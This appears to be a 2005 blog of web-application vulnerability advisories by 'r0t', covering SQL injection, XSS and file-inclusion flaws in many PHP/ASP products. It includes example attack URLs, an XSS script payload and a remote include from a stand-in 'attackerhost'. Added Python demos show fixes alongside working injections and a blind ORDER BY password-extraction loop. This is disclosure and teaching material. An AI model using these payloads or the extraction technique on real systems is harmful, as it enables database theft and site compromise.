/index.php?_m=troubleshooter&_a=steps&troubleshootercatid=
/index.php?_m=downloads&_a=viewdownload&downloaditemid=
/index.php?_m=downloads&_a=
/index.php?_m=knowledgebase&_a=
/index.php?_m=tickets&_a=
/index.php?_m=news&_a=
/index.php?_m=news&_a=viewnews&newsid=

Solution:
Edit the source code to ensure that input is properly sanitised.

OWOS Lite 3.0 SQL inj.

Online Work Order Suite: Lite Edition for ASP 3.0 SQL inj.
Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/owoslite/
affected version: 3.0 and prior


Vuln. Description:
Input passed to the "keyword" parameter in "search.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

OASYS Lite 1.0 "search.asp" XSS vuln.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/oasyslite/
affected version: 1.0 and prior

Vuln. Description:
Search parameters passed to "search.asp" aren't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

OKBSYS Lite 1.0 "search.asp" XSS vuln.

Online Knowledge Base System: Lite Edition 1.0 XSS vuln.
Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/okbsys/
affected version: 1.0 and prior


Vuln. Description:
Input passed to the "q" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/search.asp?q=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&c=&a.x=21&a.y=11

Solution:
Edit the source code to ensure that input is properly sanitised.

Helpdesk Issue Manager v0.9 SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://helpdesk.centralmanclc.com/
affected version: v0.9 and prior

Vuln. Description:
Input passed to the "id" parameter in "issue.php" isn't properly sanitised before being used in a SQL query.
Parameters passed to "find.php" aren't properly sanitised before being used in a SQL query either.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/issue.php?id=[SQL]
/find.php?act=action&reset=yes&detail%5B%5D=[SQL]
/find.php?page=0&act=action&orderby=sortorder&orderdir=[SQL]
/find.php?page=0&act=action&orderby=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SMBCMS v2.1 SQL injection.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.smbcms.com
affected version: v2.1

Vuln. Description:
SMBCMS search engine contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

DapperDesk 3.0.x "page" SQL inj.

DapperDesk "page" SQL inj.
Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://www.dapperdesk.com/
affected version: 3.0.1 and prior


Vuln. Description:
Input passed to the "page" parameter in "news.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/news.php?page=[SQL]

Solution:

Edit the source code to ensure that input is properly sanitised.

Systems Panel v1.0.x Multiple SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.sysbotz.com
Product link:http://www.sysbotz.com/products/systemspanel/index.htm
affected version: 1.0.6 and prior


Vuln. Description:
Input passed to the "cid" parameter in "knowledgebase/index.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "aid" parameter in "knowledgebase/view.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "cid" parameter in "contact/update.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "letter" parameter in "links/index.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "mid" parameter in "messageboard/view.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "tid" parameter in "tickets/view.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/systemspanel/knowledgebase/index.php?cid=[SQL]
/systemspanel/knowledgebase/view.php?aid=[SQL]
/systemspanel/contact/update.php?cid=[SQL]
/systemspanel/links/index.php?letter=A[SQL]
/systemspanel/messageboard/view.php?mid=[SQL]
/systemspanel/tickets/view.php?tid=[SQL]

Solution:

Edit the source code to ensure that input is properly sanitised.

pdjk-support suite sql inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://support.pdjkeelan.com/
affected version: 1.1a retail edition and prior.

Product Description:
The pdjk-support suite is a full suite of online technical support segments. These segments include: News - the ability to add news to the front page of your support suite and allow users to comment on the news articles. FAQs - sorted into categories, sub-categories, most viewed, newest entries etc. Users can also submit FAQs for administration approval, and FAQs can also be commented on, similar to the news commenting system. Admins can also include HTML in their FAQs. Support - this allows users to submit support tickets so that an administrator can respond with the help they need; the support ticket can be opened/closed by both the admin and the user. Admins can also include HTML in their entries. Custom fields in the support tickets. E-mail notification about support tickets for admins for individual departments or all departments. Administration Panel - a very easy to use but in-depth admin panel featuring administration for all of the features in the support suite. Other sections include: - Search - Dynamic ranks - Dynamic Departments - Template Creator - In-depth logging system - Easy-to-use installer

Vuln. Description:
Input passed to the "rowstart", "news_id" and "faq_id" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?page=home&order=&orderby=&rowstart=[SQL]
/index.php?page=news&subsection=viewcomments&news_id=[SQL]
/index.php?page=faq&subsection=viewfaq&faq_id=[SQL]


Solution:

Edit the source code to ensure that input is properly sanitised.

The last few days..

Over the last few days, when I had some free time, I decided to just look around for various vulnerabilities. I didn't find anything serious, I didn't put much time into it, plus I only looked superficially.. What I found I published here and sent to Secunia + security.nnov ... I happened to notice that SecurityFocus at first took them from Secunia... so the author was listed as "r0t", the shortened version of my nick. Today I looked at what is going on there after noticing yesterday's findings... I saw that now they diligently take what they need from the blog and don't wait for Secunia ... because for the very same Orca forum vulnerability the credit is given as "Credit: r0t3d3Vil is credited with the discovery of this vulnerability".
The following ones already say r0t3d3vil..
Oh well... you can't teach everyone to read Latvian :)

I'll probably throw in a couple more vulnerabilities in the coming days if I have a little free time.

Well, since I'm busy + RaZbh is also busy, cembo is currently working on "Alberts" and improving it.. and also tinkering with the new website...

About those advisories.. well, since there will be some page besides this blog, which is a hodgepodge, I decided the site could use a couple of raw advisories anyway.. Neither I nor my teammates personally need badges, but if it's security... then security... it makes me laugh.. :)

Apologies to everyone that the blog has now been used as a bugtraq list.. Soon enough I'll be writing again about how sunny the streets of Riga are :)

AgileBill 1.4.x "id" sql injection.

AgileBill "id" parameter sql injection.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://agileco.com/
affected version: 1.4.92 and possibly prior versions.

Product Description:
AgileBill features a powerful ticket system that seamlessly integrates with its comprehensive billing and account management tools geared for multiple industries, including digital goods, web hosts, ISPs, and VOIP providers. The Ticket system supports e-mail piping via POP and IMAP accounts, unlimited staff with configurable permissions, unlimited departments with customizable group requirements so you can sell access to clients needing varying support levels, as well as powerful search and reporting capabilities. With AgileBill, there is no need to maintain separate systems for account registration, management, and authentication as it handles all this as well as billing, invoicing, and reporting on the commerce side. Other available plugins for AgileBill include Affiliates, Campaign Tracking, Web Hosting & Domain Automation, Integration with popular CMS and Forum Systems, Content Protection for sellers of Digital Goods, and much more.


Vuln. Description:
Input passed to the "id" parameter of the "product_cat" page isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
http://host/?_page=product_cat:t_Paged%20Listing&id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

cSupport "pg" SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:www.forperfect.com
Product link:http://www.forperfect.com/csupport/
affected version: 1.0 and prior

Vuln. Description:
Input passed to the "pg" parameter in "tickets.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/csupport/tickets.php?param=dept&dirc=&pg=[SQL]
/csupport/tickets.php?param=dept&dirc=ASC&pg=[SQL]
/csupport/tickets.php?param=dept&dirc=DESC&pg=[SQL]
/csupport/tickets.php?param=name&dirc=&pg=[SQL]
/csupport/tickets.php?param=subject&dirc=ASC&pg=[SQL]
/csupport/tickets.php?param=timestamp&dirc=DESC&pg=[SQL]
/csupport/tickets.php?param=id&dirc=ASC&pg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Thursday, November 24, 2005

iSupport 1.x "include_file" SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://www.idevspot.com/
Product link:http://www.idevspot.com/index.php?page=p_detail%7E1
affected version: tested on 1.06 and the latest 1.x

Vuln. Description:
Input passed to the "include_file" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/iSupport/index.php?include_file=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.


I also suppose that with a specially crafted request a local file include may be possible, if... or if... :)

HelpDeskPoint Free Help Desk Software SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://helpdeskpoint.com
affected version: 2.38 and prior


Product Description:

HelpDeskPoint.com welcomes you to one of the most advanced help desk support software packages released to the open source community. This help desk application will allow your organization the flexibility it needs to quickly respond to trouble ticket calls. Our help desk support software is written in PHP and uses a MySQL backend. Installing the support software is simple, requiring no programming knowledge. Everything about the help desk software is customizable through the help desk administrator interface. Please take some time and look around our site; you will find we have provided all the resources necessary to evaluate our help desk support software.


Vuln. Description:

Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?page=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

IsolSoft Support Center SQL inj.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.isolsoft.com/
affected version: Support Center v2.2 and prior

Vuln. Description:
Input passed to the "field" parameter and the other search parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=any&lorder=[SQL]
/search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=[SQL]
/search.php?field=Subject&searchvalue=&Category=any&Status=[SQL]
/search.php?field=Subject&searchvalue=&Category=[SQL]
/search.php?field=Subject&searchvalue=[SQL]
/search.php?field=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

iDesk "cat_id" SQL inj.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.nicecoder.com/
affected version: 1.0 and prior

Vuln. description:
Input passed to the "cat_id" parameter in "faq.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

DeskLance Vuln.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.desklance.com/
affected version: 2.3 and prior

Vuln. description:
Input passed to the "main" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

example:
/support/index.php?main=http://attackerhost/file

Also, the "announce" parameter isn't properly sanitised before being used in a SQL query. A failed query discloses the full installation path to the attacker, and the parameter can be exploited by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

ActiveCampaign KnowledgeBuilder Vuln.

ActiveCampaign KnowledgeBuilder SQL Injection and Denial of Service.
Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.activecampaign.com/kb/
KnowledgeBuilder Version: 2.4 and prior

Vuln. description:

1.
Input passed to the "article" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
example:
http://host/KnowledgeBuilder/index.php?article=[SQL]


Successful exploitation requires that "magic_quotes_gpc" is disabled.

2.
Input passed to the "category" parameter in "index.php" isn't properly verified, before it is used when sending requests to the database. This can be exploited to cause a large amount of SQL queries to be sent to the database via an invalid "category" parameter.

Successful exploitation causes a vulnerable system to consume a large amount of CPU resources.


Solution:
Edit the source code to ensure that input is properly sanitised.

ActiveCampaign SupportTrio Local File Inclusion vuln.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.activecampaign.com/supporttrio/
affected version: 1.4 and prior

Vuln. description:
Input passed to the "page" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled.


example:
http://host/SupportTrio/index.php?pf=kb&page=host/file

Solution:
Edit the source code to ensure that input is properly sanitised.
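The DeskLance "main=" and SupportTrio "page=" entries above both describe an include path built straight from a request parameter. The following is an added example, written for this page in Python rather than the vendors' PHP and not code from either product, of the check such a parameter needs before it reaches include(). The page directory, the file names kb.php and home.php and the ".php" suffix are assumptions for the demo; the NUL-byte check is the reason the SupportTrio entry says exploitation needs magic_quotes_gpc off, since magic_quotes escapes the NUL that truncates an appended suffix.

```python
"""Added example (not the vendors' code): an include-path check for
parameters like DeskLance's "main=" and SupportTrio's "page=".  The page
directory and its contents are constructed in a temporary folder."""
import os
import re
import tempfile
from urllib.parse import unquote


class IncludeRejected(ValueError):
    """Raised with the reason a requested include was refused."""


def resolve_include(base_dir, raw_page, suffix=".php"):
    """Map a user-supplied page name to a file inside base_dir, or refuse.

    Checks, in order:
      1. URL wrappers (http://, ftp://, php://, ...): remote file include.
      2. An embedded NUL byte: the classic way to cut off an appended suffix
         so that "../../etc/passwd%00" includes the raw file.  This is what
         magic_quotes_gpc happens to block, because it escapes the NUL.
      3. A conservative character set for the name (rejects "data:" style
         wrappers without slashes, backslashes, and anything exotic).
      4. The resolved path must stay under base_dir: path traversal.
    """
    page = unquote(raw_page)
    if "://" in page:
        raise IncludeRejected("remote include")
    if "\x00" in page:
        raise IncludeRejected("NUL byte in path")
    if not re.fullmatch(r"[A-Za-z0-9_./-]+", page):
        raise IncludeRejected("invalid character in page name")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, page + suffix))
    if os.path.commonpath([root, candidate]) != root:
        raise IncludeRejected("path escapes the page directory")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such page")
    return candidate


def audit_include(base_dir, raw_page):
    """The rejection reason, or "ok" if the file would be included."""
    try:
        resolve_include(base_dir, raw_page)
        return "ok"
    except IncludeRejected as exc:
        return str(exc)


def make_demo_root():
    """Constructed page directory holding two legitimate includes."""
    root = tempfile.mkdtemp(prefix="pages-")
    for name in ("kb.php", "home.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php echo 'page %s'; ?>\n" % name)
    return root


DEMO_ROOT = make_demo_root()

if __name__ == "__main__":
    probes = ("kb", "http://attackerhost/file", "../../../etc/passwd%00",
              "../../../etc/passwd", "/etc/passwd",
              "php://filter/resource=kb", "data:text/plain,x", "missing")
    for probe in probes:
        print("%-28s %s" % (probe, audit_include(DEMO_ROOT, probe)))
```

The order of the checks matters only for the reason reported; any one of them alone is not enough, which is why a fixed allow-list of page names is the simplest single fix when the set of includable pages is known.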

Zina SQL injection vulnerability.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://www.pancake.org/zina/
affected version: Zina v0.12.07 and prior.

Vuln. description:
Input passed to the "p" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
http://host/zina/index.php?p=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, November 23, 2005

sCssBoard XSS vuln in search param.

Vuln. discovered by: r0t
Date: 24 nov. 2005
Vendor:http://scssboard.if-hosting.com/wiki/index.php/Main_Page
affected version: tested on sCssBoard 1.2 and 1.12; prior versions may also be affected

Vuln. description:
An input parameter in the sCssBoard search module isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

freeForum 1.x "cat" and "thread" SQL inj.

freeForum 1.x "cat" "thread" SQL inj.
Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://soft.zoneo.net/freeForum/
affected version: 1.1 and prior

Vuln. description:
Input passed to the "cat" and "thread" parameter in "forum.php" isn't properly sanitised before being used in a SQL query.


example:
/freeForum/forum.php?cat=[SQL]
/freeForum/forum.php?mode=thread&thread=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca forum 4.3.x "msg" Sql inj.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://www.greywyvern.com/orca
affected version: 4.3b and prior

Product description:
Looking for a simple feedback or discussion forum for your website? Not every site is big enough for scripts like phpBB, which take up an entire page and load you with logins and options that discourage casual contributors.
The Orca Forum is a free and simple discussion board script which can be integrated directly with your existing page layout, or used on its own. It sports the favorite features of the big guys: avatars, email notification, and a BBCode derivative; while retaining the simplicity of an open newsgroup. The threaded layout presents a newsgroup-style navigation system, and also includes a search function, ability to mark posts by date, and the option to order threads by last post (the "bump" system) or original post date (newsgroup style).

Vuln. description:
Input passed to the "msg" parameter in "forum.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
http://host/forum.php?msg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

VUBB Forum SQL and XSS vuln.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://www.vubb.com/
affected version: alpha rc1


Product description:
Free PHP/MySQL forum/bulletin board system. The only interactive forum where not only administrators fix the bugs and add new features, but the users can too! Features at a glance * Language System, easily change the forum's language with the use of language packs. * Administration Control Panel, control every aspect of your forum. * Moderation Options, assign moderators, edit, delete etc options for posts. * Link Forums, use a forum as a link to another site, useful for affiliate links. * BBCode & Smilies Support, make text bold, italic, insert smilie faces etc. * Template System, control the look of your forum with html templates and css files. * Full Groups & Permissions System, assign users to whatever user group you want, create, edit and delete groups. * Polls, include as many options as you want.


Vuln. description:

1. Multiple SQL Vuln.
Input passed to the "f" parameter in "viewforum.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "t" parameter in "viewtopic.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "view" parameter in "usercp.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

http://host/forum/index.php?act=viewforum&f=[SQL]
http://host/forum/index.php?act=viewtopic&t=[SQL]
http://host/forum/index.php?act=usercp&view=[SQL]

2. XSS

Parameters of the user profile edit fields aren't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.
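The OASYS, OKBSYS, sCssBoard and VUBB entries above all come down to request data being written back into HTML without encoding. The following added example (written for this page; not code from any of those products) takes the exact q= payload from the OKBSYS advisory earlier on this page, renders it through a toy search page with and without output encoding, and uses an HTML parser to check whether script survived. The page templates and the second, attribute-context payload are constructed for the demo.

```python
"""Added example (not the vendors' code): the reflected payload from the
OKBSYS advisory rendered into text and attribute context, with and without
HTML entity encoding, plus a parser-based check for executable script."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# The q= value from the OKBSYS advisory URL, still percent-encoded.
ADVISORY_PAYLOAD = "%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E"
# Constructed second payload for the attribute context: no angle brackets,
# so a filter that only strips "<" and ">" would let it through.
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)'


def decoded_payload():
    """What the server actually sees after URL decoding the advisory value."""
    return unquote(ADVISORY_PAYLOAD)


def render_vulnerable(q):
    """Toy search page that echoes the query raw into text and attribute context."""
    return ('<p>Results for: %s</p>\n'
            '<input type="text" name="q" value="%s">' % (q, q))


def render_fixed(q):
    """Same page with entity encoding.  quote=True also encodes the double
    quote, which escape() leaves alone by default and which is exactly the
    character that breaks out of an attribute value."""
    safe = escape(q, quote=True)
    return ('<p>Results for: %s</p>\n'
            '<input type="text" name="q" value="%s">' % (safe, safe))


class ScriptFinder(HTMLParser):
    """Records the two ways the payloads above can execute: a <script>
    element, or an on* event-handler attribute on any element."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append("%s handler on <%s>" % (name, tag))


def script_findings(html):
    """Parse the rendered page roughly the way a browser tokenises it and
    return the executable findings; an empty list means the payload stayed
    inert text."""
    finder = ScriptFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    q = decoded_payload()
    print(q)
    print("vulnerable, text payload:     ", script_findings(render_vulnerable(q)))
    print("fixed, text payload:          ", script_findings(render_fixed(q)))
    print("vulnerable, attribute payload:", script_findings(render_vulnerable(ATTRIBUTE_PAYLOAD)))
    print("fixed, attribute payload:     ", script_findings(render_fixed(ATTRIBUTE_PAYLOAD)))
```

The attribute-context case is the one worth remembering when the solution line says "properly sanitised": stripping tags is not enough, the output must be encoded for the context it lands in.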

Web Host Directory Script Multiple vuln.

Softbiz Web Host Directory Script Multiple vuln.
Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:www.softbizscripts.com
Product link:http://www.softbizscripts.com/web-hosting-directory-script.php
affected version:1.1 and prior

Product Description:

Softbiz Web Host Directory Script is an advanced PHP script to run your own web host comparison site. Since companies in the web hosting industry offer very high volumes of affiliate commissions, this script has great potential to generate very heavy revenues for you. FULLY customizable colors and graphics of the site make this script VERY SPECIAL.


Vuln Description:

1. Multiple SQL vuln.

Input passed to the "cid" parameter in "search_result.php" and "browsecats.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "sbres_id" parameter in "review.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "h_id" parameter in "email.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/search_result.php?cid=[SQL]
/review.php?sbres_id=[SQL]
/browsecats.php?cid=[SQL]
/email.php?&h_id=[SQL]

2. SQL in search module

The Softbiz Web Hosting Directory Script search engine contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This may allow an attacker to inject or manipulate SQL queries in the backend database. Additionally, if a failed query is performed, the program will disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Vote! Pro 4.x "poll_id" Sql inj.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor: Shedix.com
Product link: http://www.vote-pro.com/
affected version: 4.x and prior.

Product Description:
Vote! Pro 4.0 is a PHP survey and voting poll solution. The unbelievable functionality and mass of useful functions of this PHP voting script will make your work especially comfortable. A flexible and fully-functional survey and voting engine for any type of web site. Easy to install and customize PHP survey script.


Vuln Description:
Input passed to the "poll_id" parameter in "poll_frame.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/poll_frame.php?poll_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Vote Caster 3.x SQL Inj. Vuln.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://www.comdevweb.com/
Product link:http://www.comdevweb.com/votecaster.php
affected version: 3.1 and prior.

Vuln. Description:
Input passed to the "campaign_id" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?pageaction=results&campaign_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Commodity Rentals 2.x "user_id" Sql inj.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://www.commodityrentals.com/
affected version: 2.x and prior

Product Description:
CommodityRentals is the most comprehensive Online Rental Business Creator script today. It comes with a full E-Commerce Capacity and is ready to go, out of the box. It can get your Online Rentals business up and running within a matter of hours. Built on a fully extendible and customizable platform, CommodityRentals makes use of an open attribute architecture, allowing you to add your own rental attributes and create your own customized version of your online rental business.

Vuln Description:

Input passed to the "user_id" parameter in "usersession" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

1-2-3 music store "AlbumID" Sql injection.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://easybe.com/
affected version: 1.0 and prior

Product Description:
1-2-3 Music Store - the music download shop for musicians and labels. Reasonably-priced software that lets you sell music downloads worldwide and keep full control over your music.

Vuln. Description:
Input passed to the "AlbumID" parameter in "process.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

digiSHOP 3.x SQL injection vuln.

Vuln. discovered by: r0t
Date: 23 nov. 2005
Vendor:http://digishop.sumeffect.com/
affected version: tested on digiSHOP 3.1.17; all 3.x and prior versions may also be vulnerable.

Vuln. Description:
1.
Input passed to the "c" parameter in "cart.php" (with "m=product_list") isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/cart.php?m=product_list&c=[SQL]

2.
The digiSHOP search engine also contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This may allow an attacker to inject or manipulate SQL queries in the backend database. Additionally, if a failed query is performed, the program will disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.


Solution:
Edit the source code to ensure that input is properly sanitised.
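Most entries on this page, from EZ Invoice's "i" parameter down to the digiSHOP "c" parameter above, describe the same defect: a request parameter pasted into query text. The following added example (written for this page in Python against SQLite; not code from any product listed here) shows why "properly sanitised" means two different things depending on where the parameter lands. A value such as an id can be validated and bound as a query parameter, while an ORDER BY column or direction like DMANews's sortorder/sortdirection, Helpdesk Issue Manager's orderby/orderdir or cSupport's dirc cannot be bound at all and must be allow-listed. It also shows that even an ORDER BY injection point is enough to read other tables one character at a time. The news and users tables and their rows are constructed for the demo.

```python
"""Added example (not code from any product on this page): the two shapes of
SQL injection that recur in these advisories, run against an in-memory SQLite
database, with the fix for each.  Table names, columns and rows are made up."""
import re
import sqlite3

# Allow-lists for the query fragments that cannot be bound as parameters.
ALLOWED_SORT_COLUMNS = {"id", "unixtime", "title"}
ALLOWED_SORT_DIRECTIONS = {"ASC", "DESC"}


def build_db():
    """Constructed sample data: a news table and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT,
                           unixtime INTEGER, published INTEGER);
        INSERT INTO news VALUES (1, 'public post', 1133000000, 1);
        INSERT INTO news VALUES (2, 'draft post', 1133100000, 0);
        INSERT INTO news VALUES (3, 'another public', 1133200000, 1);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
        """
    )
    return db


def vulnerable_lookup(db, raw_id):
    """The pattern every advisory describes: the parameter is pasted into the
    query text.  No quote is needed to break out of a numeric comparison, so
    magic_quotes_gpc offers no protection for this shape."""
    sql = "SELECT id, title FROM news WHERE published = 1 AND id = " + raw_id
    return db.execute(sql).fetchall()


def safe_lookup(db, raw_id):
    """Fix for a numeric id: validate the shape, then bind the value so the
    driver passes it out of band and it can never alter the query structure."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    return db.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?",
        (int(raw_id),),
    ).fetchall()


def vulnerable_list(db, sortorder, sortdirection):
    """sortorder=[SQL] style: ORDER BY is built from raw input.  Identifiers
    and keywords cannot be bound, which is why this shape survives in code
    that already uses prepared statements for its WHERE clauses."""
    sql = "SELECT id FROM news WHERE published = 1 ORDER BY %s %s" % (
        sortorder, sortdirection)
    return [row[0] for row in db.execute(sql)]


def safe_list(db, sortorder, sortdirection):
    """Fix for ORDER BY / LIMIT style fragments: allow-list, never escape."""
    if sortorder not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    if sortdirection not in ALLOWED_SORT_DIRECTIONS:
        raise ValueError("unsupported sort direction")
    sql = "SELECT id FROM news WHERE published = 1 ORDER BY %s %s" % (
        sortorder, sortdirection)
    return [row[0] for row in db.execute(sql)]


def leak_via_sort_oracle(db, max_len=16):
    """Blind extraction through the ORDER BY injection point: each probe makes
    the sort key depend on a condition about the admin password, so the row
    order answers one yes/no question per request.  Returns the password."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for _ in range(max_len):
        for ch in alphabet:
            probe = recovered + ch
            expr = ("CASE WHEN (SELECT password FROM users WHERE id = 1) "
                    "LIKE '%s%%' THEN id ELSE title END" % probe)
            # Sorting by id yields [1, 3]; sorting by title yields [3, 1].
            if vulnerable_list(db, expr, "ASC") == [1, 3]:
                recovered = probe
                break
        else:
            break  # no character extends the prefix: end of the secret
    return recovered


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "1 OR 1=1"))  # unpublished row leaks
    print(vulnerable_lookup(db, "0 UNION SELECT id, name || ':' || password FROM users"))
    print(leak_via_sort_oracle(db))  # s3cret, via ORDER BY alone
    print(safe_lookup(db, "1"), safe_list(db, "unixtime", "DESC"))
```

The oracle loop is the practical answer to "it is only an ORDER BY parameter": a sort column the attacker controls is a boolean side channel into every table the database user can read.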

 
Copyright (c) 2006 Pridels Sec Crew